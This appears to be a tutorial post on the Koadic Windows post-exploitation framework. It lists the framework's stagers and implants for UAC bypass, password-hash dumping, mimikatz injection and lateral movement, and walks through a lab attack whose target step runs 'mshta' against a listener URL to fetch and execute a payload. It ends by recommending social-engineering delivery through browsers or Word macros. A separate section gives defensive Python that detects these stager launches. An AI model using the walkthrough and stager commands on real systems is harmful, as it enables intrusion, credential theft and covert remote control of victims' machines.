Post-exploitation tool Koadic



  • Koadic project home page

    https://github.com/zerosum0x0/koadic

    Introduction

    Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. The main difference is that Koadic uses Windows Script Host (i.e. JScript/VBScript) for most of its operations, with compatibility built into the core so that it supports a default installation of Windows 2000 without any service pack (and possibly even NT4) through Windows 10.
    Payloads can be served entirely in memory from stage 0 onwards, and communication can be encrypted with SSL and TLS (depending on what the victim operating system has enabled).
    Koadic also aims to be compatible with both Python 2 and Python 3.

    Usage

    COMMAND     DESCRIPTION
    load        reloads all modules
    info        shows the current module options
    use         switch to a different module
    set         sets a variable for the current module
    jobs        shows info about jobs
    help        displays help info for a command
    cmdshell    command shell to interact with a zombie
    kill        shows info about jobs
    listeners   shows info about stagers
    exit        exits the program
    zombies     lists hooked targets (all zombie sessions)
    run         runs the current module (the equivalent of exploit)
    verbose     exits the program


    Stagers

    Stagers are the kinds of payload generated on your attacking machine.

    Module                   Description
    stager/js/mshta          serves payloads in memory using MSHTA.exe HTML Applications
    stager/js/regsvr         serves payloads in memory using regsvr32.exe COM+ scriptlets
    stager/js/rundll32_js    serves payloads in memory using rundll32.exe
    stager/js/disk           serves payloads using files on disk

    Implants

    Module                              Description
    implant/elevate/bypassuac_sdclt     Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
    implant/fun/zombie                  Maxes volume and opens The Cranberries YouTube in a hidden window.
    implant/fun/voice                   Plays a message over text-to-speech.
    implant/gather/clipboard            Retrieves the current content of the user clipboard.
    implant/gather/hashdump_sam         Retrieves hashed passwords from the SAM hive.
    implant/gather/hashdump_dc          Domain controller hashes from the NTDS.dit file.
    implant/inject/mimikatz_dynwrapx    Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
    implant/inject/mimikatz_dotnet2js   Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
    implant/inject/shellcode_excel      Runs arbitrary shellcode payload (if Excel is installed).
    implant/manage/enable_rdesktop      Enables remote desktop on the target.
    implant/manage/exec_cmd             Run an arbitrary command on the target, and optionally receive the output.
    implant/pivot/stage_wmi             Hook a zombie on another machine using WMI.
    implant/pivot/exec_psexec           Run a command on another machine using psexec from sysinternals.
    implant/scan/tcp                    Uses HTTP to scan open TCP ports on the target zombie LAN.
    implant/utils/download_file         Downloads a file from the target zombie.
    implant/utils/upload_file           Uploads a file from the listening server to the target zombies.

    Installation and example

    Attacking machine: 192.168.145.129
    Target: Windows 7 Ultimate (192.168.145.130)

    git clone https://github.com/zerosum0x0/koadic.git
    cd koadic
    pip install -r requirements.txt
    ./koadic
    set LHOST 192.168.145.129
    set LPORT 6666
    info

    At this point you may run into this error: UnicodeDecodeError: 'ascii' codec can't decode byte 0xe5 in position 108: ordinal not in ran

    run

    [+] Spawned a stager at http://192.168.145.129:6666/DDEUV
    [!] Avoid manually editing this URL!!!
    [>] mshta http://192.168.145.129:6666/DDEUV


    On the target, run

    mshta http://192.168.145.129:6666/DDEUV
    

    Once that runs, you can see the target has checked in.

    But we have no privileges yet and cannot do much more, so the next step is a UAC bypass.

    Here I picked eventvwr; either of the two works, but note that the first one sometimes opens Event Viewer.

    As before, just set the parameters and run it.

    Next, let's try uploading an image to the target.
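From the defender's side, the check-in above is the detection opportunity: each of the three in-memory stagers launches a signed Windows binary (mshta.exe, regsvr32.exe, rundll32.exe) with a URL or inline script on its command line. The following Python is an added example, not code from Koadic or from this post; it runs simple rules over constructed Sysmon-style process-creation records (the field names and sample command lines are assumptions modelled on the stagers listed earlier) and returns each hit with the stager URL, while leaving local-file look-alikes alone.

```python
import re

# Constructed Sysmon Event ID 1 style records (not real telemetry); the
# field names and command lines are assumptions modelled on Koadic's stagers.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://192.168.145.129:6666/DDEUV"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://192.168.145.129:6666/XYZ scrobj.dll"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'},
    # Benign look-alikes: a local HTA and an ordinary DLL registration.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta C:\Program Files\Vendor\setup.hta"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Windows\System32\vendor.dll"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def classify(event):
    """Return (rule, url) for a stager-like process launch, else None."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    low = cmd.lower()
    match = URL_RE.search(cmd)
    url = match.group(0) if match else None
    # stager/js/mshta: HTA fetched from a URL instead of a local file
    if image == "mshta.exe" and url:
        return ("mshta_remote_hta", url)
    # stager/js/regsvr: /i:<url> with scrobj.dll runs a remote COM scriptlet
    if image == "regsvr32.exe" and "/i:" in low and url and "scrobj.dll" in low:
        return ("regsvr32_remote_scriptlet", url)
    # stager/js/rundll32_js: javascript: protocol handler abuse
    if image == "rundll32.exe" and ("javascript:" in low or url):
        return ("rundll32_javascript", url)
    return None

def scan(events):
    """Apply classify() to every record and keep only the hits."""
    hits = []
    for event in events:
        result = classify(event)
        if result:
            hits.append((result[0], result[1], event["CommandLine"]))
    return hits

if __name__ == "__main__":
    for rule, url, cmdline in scan(SAMPLE_EVENTS):
        print(f"[{rule}] url={url} cmd={cmdline}")
```

The URL column gives the listener address to block or hunt for in proxy logs; a local-path HTA or a plain DLL registration does not match any rule.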

    Takeaways

    This remote-control tool not only supports TLS/SSL encryption; running silently in the background also makes the attack harder to notice. Its modules cover UAC bypass, hash and password collection, injection, and file upload/download.
    As for usage scenarios, social engineering brings out the real power of the tool: delivery through IE or a Word macro is far more likely to catch someone than a cmd command.

